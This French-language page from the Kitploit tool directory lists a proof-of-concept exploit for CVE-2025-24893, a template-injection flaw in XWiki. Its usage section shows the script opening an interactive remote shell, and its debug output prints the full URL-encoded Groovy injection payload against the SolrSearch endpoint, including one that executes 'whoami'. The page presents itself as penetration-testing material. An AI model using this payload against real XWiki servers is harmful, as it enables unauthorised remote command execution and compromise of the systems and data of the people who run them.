Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893 — Preuve de concept pour CVE-2025-24893, une vulnérabilité SSTI dans XWiki, fournissant un shell interactif pour l'exécution de commandes à distance. | Kitploit
Outils/GitHubGitHub/y2f05p2w/cve-2025-24893
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHuby2f05p2w/cve-2025-24893

CVE-2025-24893

Preuve de concept pour CVE-2025-24893, une vulnérabilité SSTI dans XWiki, fournissant un shell interactif pour l'exécution de commandes à distance.

Voir le dépôt
il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Infos

Ce PoC teste d'abord la SSTI et, si elle fonctionne, il boucle et vous permet d'exécuter des commandes à distance.

Les commandes exec et shell font actuellement la même chose.

Utilisation

Connexion

root@kitploit:~
python3 poc.py <cible>

Exemple

Avec debug défini sur False (par défaut)

root@kitploit:~
python3 poc.py http://127.0.0.1:8080
[*] Ciblage de http://127.0.0.1:8080
[+] La cible est vulnérable !
(xwiki-shell) > help

Commandes documentées (tapez help <sujet>) :
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki

Avec debug défini sur True

Le drapeau debug en haut du script vous montrera les URL générées. Il créera un fichier debug.log contenant la réponse brute de la requête.

root@kitploit:~
python3 poc.py http://127.0.0.1:8080
[*] Ciblage de http://127.0.0.1:8080
[DEBUG] URL utilisée : http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Type de contenu de la réponse : application/rss+xml;charset=utf-8
[+] La cible est vulnérable !
(xwiki-shell) > help

Commandes documentées (tapez help <sujet>) :
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL utilisée : http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Type de contenu de la réponse : application/rss+xml;charset=utf-8
xwiki
Télécharger l’outil